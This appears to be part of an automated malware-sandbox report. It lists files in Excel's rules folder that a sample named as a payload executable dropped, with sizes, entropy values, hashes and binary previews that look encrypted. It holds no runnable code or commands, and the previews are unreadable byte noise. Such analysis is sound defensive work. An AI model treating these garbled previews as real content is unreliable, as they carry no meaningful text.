                                                                                                                          Preview:<?xml......?.u...].........y..V&....<......v.g.!'.K}.....#.M.Ol~.^...P.M.A...."}/...aNw-...q...[.z..@...I.[ 7..d.I.....b.......U...s...~j.z*..Dw.ot..L.m,..0."..X.i.>*....e..\..w.C.).......V...6....i..n..DJ....QD~../.{i.q..R....$.&....".d..^.a..7.[....8...z.....[P.5..A;.9 .........O<......A...vn.s......P+.E..KY...(..T^..k./[p|.A.5....&^.F...g.Cg`0.1.T..x$Wj...A...'..o...?..].e..Rn...\..i%.....Z.C&/8..B.....;1..|...y1e.N.?..S..[. U.5...tu....=m..........)6....H......2.%...1.b}."'.;{..'N;.5+.q..e...?,.G.h"7.......s*...........1.#..;....zC.Q.m..$T....1.XA..3..S..iE../.l..:[/..\..U...]...ffN..,..D......{..PZ|6.m./*.q.....J...G...L0...&......B*...l.K.2.E.<%.%..D.K.d<...\..G..w..."...y"..%A...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11989v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1034
                                                                                                                          Entropy (8bit):7.794183407169848
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Sv7PubgZqMvTHD8l+JM4mCEi5T+FgFN92E3xbW0IyBCU3Q/taGfdo/6HzspDShsD:Y4gZnznV4CN9X3xVA/QGfWyTiSyzbD
                                                                                                                          MD5:97E68399CB96F3EF0B53635E9A6EBF04
                                                                                                                          SHA1:E84A3A69F979D0A38A70B80AB3683B87F4A1245D
                                                                                                                          SHA-256:52F0CB3FA4ED7E9B56D813B854C6E40F702C617D0DBCE409308545137C9D0326
                                                                                                                          SHA-512:DD96580D828A66FC94C0EF0798E100C46E78F960E7294DB682D24B5A2B9B75952576D8A803C57B17663D8F4253152D9587E2B62E3626C7C64EA4112965D19F0E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.[..m../.....)N.=".....fP....n.....B...{..+.X.4\.40..5.2.EE.}@.l.Y.lz....0.C=.eO.....-..$.......A..Ww..^c\D..5_.Kcc'.6@.iJ.CJJ.(.(....za.:o021S.6....W?x..{.]~..o%.b~.|Ck...:(.C.Z.XP.s....C.qZ..N.YT.H'...,j.6.o......i2..wd...o\.....~.....TK...*.;...4..+....Z..\.....04....W".Q..l^.9.....mz.,.T$IHn.<].w.2D.r.....x..Ah.7d.c?b......t......o\}..E.PKO..1.v....zz~*..L.u...R.T.O...*...A..<s.ZH.J...Vr...<&.bkh..&.g..r....g..S....^T.......+v.....k.M..%p....c..q...J.Z.....P.i<.....}[t..]. ..q.P......s.....8&%.P.b0.....p&?.#.wg.....UC.4....m....B.)r.##.O...d...?....r...Y.l..q.1...Gc...6..!.....K.a....Y..`..O.I.....G..*.....%...D....NJ...8..]*.Kn......yL#....y|.............1J...N.....).A..$'6_.}...3...W.....~.u.3|.c.f0T..MS+.&|.#e.......A..%.....ho....dCf.=.........:..e....+..b....IY....;..X...M..Cd..'.#...)..4k.m.O.{.[...i.v..~.vD... .l.......-...AG..(DwW4..u:..EG..U..m.d...:....S..j....+0...a'Q....}....VphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120100v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1333
                                                                                                                          Entropy (8bit):7.8264902989064735
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:AZN26WMHziC9lNUC9q4lD2kI+59cHeTksTianvRFkxsAnYibD:A/20+Kb9dlqkx1TksLnvRuD
                                                                                                                          MD5:0CE965B73ACABA21B8A13025BC61557F
                                                                                                                          SHA1:1BB2DE85D35416F189024FF10FDCB404E577340E
                                                                                                                          SHA-256:F80A2008393316F2BA5D5A59D38EA887B39A632A10F250313F2614E6A62C1FEE
                                                                                                                          SHA-512:939A4F3E7342E6057924E228DED50D9E8BF0792951E73CFC95895DF6B5EA66EEB673653EA9246E593243446E3BD54777E1C24EF41D8D31FBE952930EACEA6DCF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..R..P..v.../E...9... ..UX.."..s...K......#%.i.Z..oI.M:........p..Y.Sx/.qs.....j9+.....e.c..J.....+.>..cX.0c....b.1T.Z....t.f=.9...;...x.."...^...y....nw.l..M =m.p.W.=Vm.........>sE\0.z6....K.%&....HrAWX#.?h.a.....X..T .B...'/.......=..l..0bO./-...Si ......U.Q....m.p..]..).jW.Y......B.;.?......e.y..T....J{...cu.h...W...r.7...{...D..i.U.h..8...T...y@..]........g.0.....}.x..|.....,.Q.M.{...4....e.A..+c..Y..].:|..W.~.....X!S_[.|...C ....c}J......c>D7..{...].@~.C.TkK...i%....G..:m..$Hj..$zg.0....}9M!.y.)...Q.7t.4.g!..5...x...t/....R.x. LN..<h....9[[}...=b...g..#..'..;...E.G..a.du.\P~.2z=.....L.E!.Z.k.T..vB..d...:....*s....x.>Nz08.`.....t........_Jz..l.vTn......X.o.W..nh.7d../`.....p.r...L....;..j.9...N.`9$E.(.!6..AA..x$....i.Y8..KmOXi.p.o.^.._Cw@...K..........7..........5"..2t..v..v.D.23.......u....~...@l:.&.*H....}Wi.i....._._.%..L.........R.L...lq...b...y.p.f......6<..z.GC7zF.9...c.l'..~;...%....IN.....a.y.^}.......~@u.....>h.S.u

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120107v6.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2514
                                                                                                                          Entropy (8bit):7.91540724551262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PcLWq89ZHabpozP6bYDHCAicGuJig/KuQFtJoy4EsUkNWXIWinJavEzluPieD:LZHJ/DAc4F3JeEsUkIXIlJavT
                                                                                                                          MD5:DD25BAE3ABEDAFFA36CFF84D373A70B8
                                                                                                                          SHA1:3251395384A76740C50779022330D40518BA240F
                                                                                                                          SHA-256:F6B635525780E83089D82BD1A8E46AF07CE6CE14390C8DB6CDC920FC3D91F06A
                                                                                                                          SHA-512:4CAD8527317DFC5ADFCAF9CFFB07082A943BF7CA0AACE1F36110599B9F038BF874BE712791A0BF2E2706ACA5BBB919FD1DDC3F939EEE1D5B9FFDCD5B8C359E7C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml8.s...V.....a.....\...i..n-q|)8.......-....y-.C.aN......~...J_......./N.....wl.qa6..........@.u/G...h..O,..4.%R...........{Z.........Z...DL.2..O.@2.o...q........._..=..)U..0%.jM.1.T...w..5....;.;.... .}.c........(.V(....L.~...rb...^.p...y"DY...Y./X..;.....=%.q+.X."$i.y........."-..C....K....4+%..Y...d9LJ..........:[T...M.xs.T.....O.i.+.IS...!S..8...>....'......%f.6.p.....C.....^....o/c$T......:O#.o...jw.mI=e...7m;}_.;..a.v.P...r....T...5y..pj..#..S..kET.5..<..x...B...._..Pp3....ni.Pb*x....K..S..4...0..r..V.m..9....hFr..2.E..@"...._..<{..'...>...:..pGY..(.A].......N.&....y.-P..V..g..].T...{.K....p.-.o_hQ"....._YOu..?t..1.XpW...PQ...K3!t...e.C..F....l...v....x...........M1.<<...@.P..[.i.d.......<,....,.7.........U.n 5.S....p.@......5.ZZ.../...%.2fz......u+.C.|.^.<x..A. ...9.g......@.#.....k.....m.Aeh...Z.3..:.*m....D7G.AB.0f.".."w...F.^........%...=S.._.l(.%...[<.A..7/..A....X...m.Uq...n.....b..L.B.@.r...]..{.R=..$..7.";..[..(.MO.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120110v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1346
                                                                                                                          Entropy (8bit):7.850612830304615
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:sn8iS2m9AyopZKTwrV6LxglU/91cjbBrg/uJiUzV5nW2RXJIrk83u1ulbD:sn8iSbAyoyT9mlw9+Hggp5W2XKr13uYD
                                                                                                                          MD5:239B6596B10EC878CA38CD7FDB0D772B
                                                                                                                          SHA1:BD008A168BA68E62903C3220EB949FFD01472781
                                                                                                                          SHA-256:A958DE1A04D75A7ADE9DAB852641599E59FDBDCB11522B8C13E43F8D913B5DF1
                                                                                                                          SHA-512:568C8CAFE5DA8542B51706474836FD64371D2BDE7E8996516CDE571EA3E4E49BA30E380EA1D830062F293DF5ABEAA53C247AE75BD1930F87843CEC54721A8EE4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml#F.ZSi.1w.Y.......|>..e&.r...gj.....[..y.<.Ay....F_../..EMj..Y......s.#.._..G^L.G......LG!~9d..q./..k.1..z....c.k....|.2e...Y..N..;.7.df.62F..}Z..U.*..w.ee.aojd..a...$...;k..v...P......K%...k.ll.i...=..........4.hbD..F.n";.....J..&E........on...hPx...`..W&.|.=L.t..6..m.Z.........]]...gu.\.VK...E&..c.<.......I....k....f.w..2u..i.{rM%..$.6...y.."k.X.P.]?t.3..} `...O.:r.U.......^.)vD.......x./.....k...#.T...m\.R..>.}y....+..G...v|......M_...M.#V.{%.C............_.O$............./|...A..1q..j_.....(.}2.T..}o..;...>.fV.}C'.M|.....NC.L.$...q..<.}^*.X.W`.. .J.+..at.....?,........t-..m@...4....).f`.;:.!...Upz.~8K....{mY..!.OuX.aFz.VT.Z.`.].3 Z.N+.9R.%_...k.L!..dP.....v...n.T.H.q~P.Jx.....N:dt.@q.N...<..=.oF..@P^...?U._..}l..GZ.I.Z...1{.{.ge_...XG...../..52.{v...].w.}.....3.........U...q.........M. .r;.X..dE...9...I$.i.......i.S.../.._.F.X7...8........4: x.3-..(....d....2...:_.Iu...;.`..i..k..O...\g......cz.~k..x....P.._....>....*....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120112v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1041
                                                                                                                          Entropy (8bit):7.790576349097644
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gfPTUAcqEa8uhV6ialCFvs7KhadcKLcepal9rXbD:QAAcqEO6lCIRdc2vwXrD
                                                                                                                          MD5:25C10C44D6FE3C7143A7639FFF322A30
                                                                                                                          SHA1:DE3434835B1D23EE654A7995015DE916C71F0AC7
                                                                                                                          SHA-256:30C820331CF1C5A2C9897ACD98E45277FD493E44A57E4BA2D455A11EFA54EE65
                                                                                                                          SHA-512:57C70F2EE2F0537F503B5ADD3C32E8E3AC10157C50B933D7A31E7B3D7F22C8AAE5B5AC1DAA758B491EB7CB708FE64A7BC296C0613EDFFE36E0DE6509FF944053
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....sV.(....y...d...xk.a./X.>...+...?..Rq.. .-.<.....4.....b..9...ZW......j.2......D.8..N.....)VV....b-V.s.........~cN..4i..Iuu.@.n..["....U]...W.8C.. .....6q.1....3.)/.fA....J.6...f70..o..*.Uy..Y`......Z.}N.e..L...`...f..95h;/<...Y.rx......./>`....t..q.F..n....>...../O;.l_....4.!kRI..V.....#..y<..qK. .../l.&.u.........3*;WL<?(..n..T[GP`..v]<l.lC.i!...g..^_.|.U...V.!....+h..N....w.N.0 ~\.R..8d._9.V..t+*x..w...a+.D>h...w......Q.....'....\...:._h...w.....n...;..V.AoG...V...`K..'].d~.....R..]K....kd.7.....q..T......7..B..g1.A.;..EN.......K....[I).R..<....%v.`?......?.jV...Ht..lt..3G.R.......t..$....Y......[2..a..,.O.K.i3K.7..:.9.|...20....=Bgx...........VUB...IG=I...j.`.5wj..s44....cH.....*..9.K.....L..|.qs?....>.Y.e.tW7:.d....s*..G/....A."...=~...W}.xTa[V...........75....H..."..@g#8RK....w...2_&=.k..X...$...4..}.l...9....7n.].8.....?S.{.l....".Lr*t|...\J...[G..Ev......F.{.qxb.......K.f....L6%f.......>}.?....%#phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDA

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120119v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1664
                                                                                                                          Entropy (8bit):7.860655993110186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UFoYIAKP6on10tGdvEHA+fENZPwjo2Yow2sReukphBnwGE9froPEdrL6/eR4O3Tc:UiBAKP67tengaeLYoP5pZnwGgcsZXO/D
                                                                                                                          MD5:CED4BFE0D4B728FD44B4083FE9660951
                                                                                                                          SHA1:D038436FE06C98BB31AF54DCF98FB215D031AE20
                                                                                                                          SHA-256:7B80002ADB10BD71934B2C3D316BD8F63D76A1463D6B44DE0B0F7D8DF2CFD355
                                                                                                                          SHA-512:C2F0F29329616A2BBE51ACD015F279CEE45A21555395FC5C832E25FF11CEA5681ED6931A9D7D3675CE84A113CE6EC68128919635553F8D8034B9C840E5E35F4E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....\.P0Yz*..Yc...ka.1...Q..._?..:C..c.aL..mmmm...A.&.....~9.....8O5..\..=...*./{....h..1e[.M_.H.F.e.....CPa...l.6.)..@%,<q..=...=r.;.Wp.Q./.8_...t.h;L&.....n......9]m....=....'....^....s,....=..W..Ab.....7.(...E............G...Et.........U..|.$...@\9.h.f...fI..........M.W..d.....Y..pl..<p....'..jbu.}.&M7A),...-.....6....D..$E.v.....wQ.|NeBr.^/.3........u..fEB...........p..2....}.F.A7..C...bB.m.......`Z7...v3..&.b.]"...)...W(.7........l...*.......c..^(..'p.....6<g_iP.......a..`...[... .<.t.+....Wj..L.q.......H .N......?..T[.t.5...1Y....2.-.%Y.]..Zx..tHe.!u..L....._...J.....P...p......c&<...l....9Z,N.>....[..za.vr.b@...c`...$b...%..B..&awK4.Qo.{..VU.c.$.....b......l.....m.C.A...l......+..X..]^^EG..*.AU.K}....x.8.2;p.P...e....N..... ....YJs..;YeS !..*.^.d...?.-....z...S.L.._.sI...]&I.tw.\.[bD.H.QWZ.(.....uK......CfY......s...(.(......0..m..^Kf%...,..*...=.YD...)B9Y8.....eUZ#;.x........#.~.....{Y......{.^*.DW.r.1@..A.x...k....)..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120120v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1195
                                                                                                                          Entropy (8bit):7.836454531135997
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:33712vWhJi8DYOmA+e4nXCwCsJF2J+lTu9twPqbD:337kSbYOmA+e4nXCVEu99D
                                                                                                                          MD5:1BFD8353B6C434BDBECBB97F3BE8A242
                                                                                                                          SHA1:B1DED596ECFC369E8FABBA64DC9A5513E2C7F367
                                                                                                                          SHA-256:2EF44601DE8746203778239482BF179C0058557C8A400D50FB0D8E9F9DFBCE2B
                                                                                                                          SHA-512:0FCFCB9BC960D266ACC9631CA2B62EF54A92DC7456CF7AD5A49D0DE30F76D25F990470B9C371F0FA6AD674CEC3DD5BE225A859FAD8F95C3D87BBF6519AEA5304
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..3...HdH.Z..\.$`.Z.(...2F..}..qw ......>.^.-. T......q.M;}$S...[....j...I[..3;......w.......!...m...eB....Y..&.$.....P...#1...qC.l.7;.....>\4...p.......]...t.`MuHh...0.{G.EF._...f.*.h...v......q.*...Y.G..*V.,}_.(/..&.......v.]..a..5..#....a.<F#..<.`.Md.[)ZN....kW2..^...I.....ZE..g..Q..8..@b......H:....Vr.r(%...D@....@<...,./%.._.B.C."....Y_.7..5..... .my/.O0.O...Q..k7M?M&..r.....L..e..K.Q.L.._5.j.d.....D.RJ...z.=;R...jd..x...nH..".....).t.... =^c&R.]:....K.W.p..N.../<.m.w%....*...E.).7>.?.c..e..6.6:H.\..4U..h.8.|.l.#f?`.u.y._i.......-.d.j]..DL.*].".%..,`y.4..)...#=c.0.g...n/......n.2c.~h...~_4...{&`~..3...1.2...3$..g......RF.s5J8../#...H..~#.....e....(@l.n.k...q..q.y.....)3l)E...%.5q.......p._/.._F.5.+.#~pR...iZJ-.9..(..{.uTP..WuLN-..,.M....B.wk..T"P..B..[ ..>B~.............2.V.\...4......~3....D1."I.M...%=...E.-.]WO~YF*V0y..~.1O...9.<..\0h......EfMq...^...,?..........L...../..DZ......_..!."t.......GX*.+..."..f>.....p..3;SJ.......fQ.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120125v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1269
                                                                                                                          Entropy (8bit):7.828909803546883
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+obEGRt/NKzY9PMdxBkfPu+ECn2PnC1m889seqnzkslwbD:bbPt/NBMdQES2J8nnzksED
                                                                                                                          MD5:E22E3EE48EB581B58923C1B33EE7399E
                                                                                                                          SHA1:873E284E19EE643FF1E7AF254599D31DF64D948D
                                                                                                                          SHA-256:313B16AC6978CA6B17FFA998819E35E05B047C79386270AC5B3CD4FEA73932A1
                                                                                                                          SHA-512:B71360B5D385D2C51C1DFFAEA86042624FB69B6F522A1A73C1BD6BF9D091BD97EA190BFB046CF73943F6E9D56633D77239A3FD8642314456C86DF3FD0CC6EB39
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlr.....Yuba)....iJ....FB...C^.c^.[V...N...y...P...NK..>!..k7...V..8...W..O&KD.w..9i..@I..U.B..'.....L.............x.....6\l.H.,...A$.N.w.....3G.9s............W.E.D&...a.G./C.Jq.G..*..|.4."s}hq.......c......s...GLB.k...Ff.sq.w....C.:.U.Z....6..@..0S.P-.......m`..%..r;....uR.)t....w...bt}......J.ih.-"...(..f..$...#...I..aMg.....U....Y....5....%..1.|.n..F....E.p..v.7p...&W..aan......e.<.(....5....#P.n..;g.,.>S..3`.BF..z2........A.T...h...L.^AiA..t7.o|e.x...GW[u<.n.........u...Z..IqM=. .A>.YYs...>.C}.|.(=6.._.....p/.)....%.vk\rE.R!%t.`.Kg...9..'.D......G..&D.*..Po~..c.e&..;..m._.!..;.;+g]...K...jgc'0..u...k.Z..5..x...k.....Q......j9..*"ir......G..w....n..A.s..5)lg>.%#..:,/..;-..P...{..q.ND..]j`...i.]pH...Q5^._....:...+.4..8..4.....b.6S..?k....{$.j...8.#.n.A.~.......p...B.5.._1:.*n..o..R.i.\F.........9...PJ....N.,zW...(..h.&o.&(.....$....&^.,....#M+o..R..z.~..B.g9T....F...:K...v..(..)...f(K..7&...Z.qME...|..c..>.........A.....H.H5..p/h.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1994
                                                                                                                          Entropy (8bit):7.908122647978365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:kXx1Fn6VU1/7hUofTXmhs/KTk1201TydxMkQAnHxPD:kXx14VU1zzTrxPTyw5cHxb
                                                                                                                          MD5:B04148737FBB7511B209AABA9D158C22
                                                                                                                          SHA1:689047F613A3DA87474089A6309B87A894C8F8AD
                                                                                                                          SHA-256:A32B6ED115884E89D5959CA4A4B2455A8498C545016C3729E0B6C7F9B2BC6A46
                                                                                                                          SHA-512:1EE31689350543F9BBFA93760D0A9C5BE0A496A39F008EEF5715151D382C14CCD42D694BCB196D3AED2BF91AF2744ECC2EEDCC74668C908716C416D88F30FC87
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml. 1...z.m..x*.d./....d..#....LE...b.:.&..K....l+...u.....vO..#b..;.....h..*{;....{.m.v#X.=...X.fN..Ws..g...aOUH:.c>V...S.....I.E.o[.q.E~m.\E.`=...Ia)~./.......0I.5..`.CF.rv..F..g4....O...-.9....2v:..Kd......s..I..E.!%..j.d.`/...*..f)...AdW*h...........x.nY....x&.$JT.....I...p6..\..xN..O.E..x....&4.H.*+.}.,0.*q.A....D.i8#=Pu....v!...'ZT..K.....4..2 .s..J.7.k\8.Gl.|....\s(q....$...N.J.....q.U8..WO0.@m]~"a...MN..b.......;"<WFTh.3.d..H..0S..."..a.LX....Hk*d...H..B.....?.m@.r..PBmH...0..%....dK..o|....^.P8.............4MZ.}..P.....3...C ...#.\...g..h.....t.(..Jx.I..c.o...L..8.......).16.A.f...#.Z...=...^....S({...i5E..(...<......}p.........e..Nn.................C..B.;./.E,Ok..9....2B%]......l....M&L.T....a<..Hz..$\....y.C[B.#3.>R".N0..u.bI:.Fb.n."...r.......'..<'..4 ..)..'..x.X"..\7\+.hO..V..a.[m....-..A....1.q.i...cG.X..i...I..c..."r4.d..F.4Z.Br?:nk..f...e.o..x........#"..E....r.....'..8m.F...l..%Y[.2.$o.j-..LHg..X..P.J...r-N.i..p7...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1506
                                                                                                                          Entropy (8bit):7.839441460106934
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Rj53wOkAwpjl81as3Wem9uq0wRw62r0/lxtpUDxf+InqRe7S8yekyHyeTwbD:B53wOkA/rWn0wKlrmxbEtQexy/ySUqD
                                                                                                                          MD5:2246C1DA0866436996CBA395E8507914
                                                                                                                          SHA1:EC4F11EDF178770D9F8A7E4A954318E4A86111AC
                                                                                                                          SHA-256:BE5683F02F8AD1AED4F7BB1DADA1F55C47BC6A2BBFD3861C58752C7362D7DFC8
                                                                                                                          SHA-512:D387D2D898B7B8EFA2F83D440702F98F40F7ED870B963BF0B933F83550C62794354AF5B75C98DC4BD93106155E7E26882A8EC7329157345A63AC09F7C0F2D5C2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlk.dAYO0..._...vy..>).7..(T..Y..xaKqN.~u=z,.m>.v.fj.m%....`$NJq a..H.y]...G...l'...'.Y.6.....wC...d7..T..S...=T7w...8...+..y.?b.B....boky.c..p,.B...J.n..i.....SJ.D...>[A..vU.2..q..j...4.<....zo....6G.K.....C.t.7.....9.R.{.o...@.[......?......x&...H.E..T.F.ms.S...-.!...0.?S..JM.3-.4......bI.g...4....j~.....4.a.n..".Z...'.MH...2..0..._.Y.p..#.).....=.~.L......]p.......B^|. ;.g."-.Q.....H.pxlX.p..e.F.ht)n..5.k..u....",*..0p.tk.b..e..T..RE.Je'6....}...EA...QS6 U^XOJ.E.O.{{O.MxE.."..B...#.Y].YK2.n..%..l....l.&...;.j.........&..ww..(Z..q...*)...c.%.T..&...`N.U,..O=+..5B.G.92.....2o....".]ej...)..!.C.."2....~.u..c...TG..%.sZ.|..t...(y...9D.%U..E?....M.".&>.F.._b,5...j.j.y.V.....b.......#q....m....Q..T.......MD.....[....U~..Ln.,.VD.b..X.$:.50..`.........K=....;...2p.y.WC..}..y....%..8....&.t.....w.K....b.........Me.(S...>8....Y..S%...u....F..n*.V.c.)..Wa.g............1...{...L........-.H..@b]..1`..^.o..w/.>d.:.F..D'.$.a....O..}0....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120127v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1511
                                                                                                                          Entropy (8bit):7.876572534919987
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IEZsrs5QMwE+UJIlspXht+isid9UUqzmi94plMwWN2U6+D/3ryQC6zo/RPq7dmiX:4gQMwHUVxQ3iDqUrO2uT3ryQnewwinbD
                                                                                                                          MD5:1274A9A2F623069F15DF4CB5500F3D6B
                                                                                                                          SHA1:9D1C2BF419A71C4D2EF4A2D2C78E9E9DD57D8CB4
                                                                                                                          SHA-256:46D5C4FA8CD1693FE2431FB0B1D7DD015927501C6F607FB12EA1C4B27003EE2C
                                                                                                                          SHA-512:21DB17E08F3C2E7D0A98123C78F1591CEE49B47260EF6023A97C490D8842FDF265DBE0DAFCC630EB181F3A1434705AD472DB040365EBD24910277A748B285194
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml5.*;~!.....5+...\4J..Cl...vt.v.N....)..3i.])N8..4.g..c..1T.=...a.p..E%....[.].|..W!.`.~..B.B.L..e....]0.........o.x..br@....d{..!..8b.........soY.....r..........>.IB.6.[v...@ hOA....@R0v.!#.By_..V$h:+.a.6._aQTMg<X1]h...APC...5..sj.q.........#$A#V.....=.q..|.T..#.8..h.O.....#........k.g..6 0. ......P...S.Ms..Y%. .\.....yS..u.._.y.7.T.-Su..:0vp_.%!.?J.\8. ...J.<..(<...5...`..<.Dt.>.M#.-..w.{....SU../..?.>..~...}.BA.Tu......&.K..J...[..1..tG...s..G$....8....e......m...V...J...5..A.f5C..r....c.a........*..Z.+..Q...._...A.._|.....m...K.a..rI..hO..8.`.v....|:....ndu.F.......p#9... .z!...A.O.....#Lr_.-o...oU.X.....k.k..R.....%",n..b..KB.=-");..v...N0....d}...*R6.d;.C...>.O.)>x G^...e.....R........+...W.El..6w=.$..z.g$....`G..^7.Q...\..E.x....Vy.B)S..q3/....(.v....2..n3 .....A.V.[....E+....9..K.:Ei'....]3K..Ow.N.......b...v.+w?7...s'>....'..oZLw.KSB...........-.*.....,9.1O..`m.@M.....n..'...n..w...M..-g2...B....Q.LW.G....=..k\......VU^CF......c.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120128v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):991
                                                                                                                          Entropy (8bit):7.761171488515837
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:lEEt1VwvVmRKP6tg8a+GeMkwgJ3mRCY+bD:BJw9mQ6WL+bhqCY8D
                                                                                                                          MD5:9339853DEF8885213E1B072489908343
                                                                                                                          SHA1:1CFB3FD3EC659E796A46AF9E7E01AB30A394CA78
                                                                                                                          SHA-256:71C71270D57F83EAB78CAB9AE713BACFBF2D43B4B331CBCEBB80FEB2AC7D5C75
                                                                                                                          SHA-512:C186B0C526742AF01F90C8B92945711ED140E80EF3867E2A07148985FA14016E327A8BB46DDD95C8ADCBA8BF96BD6DB954D7A0EE83200864109C1A0DF7FB951B
                                                                                                                          Malicious:false
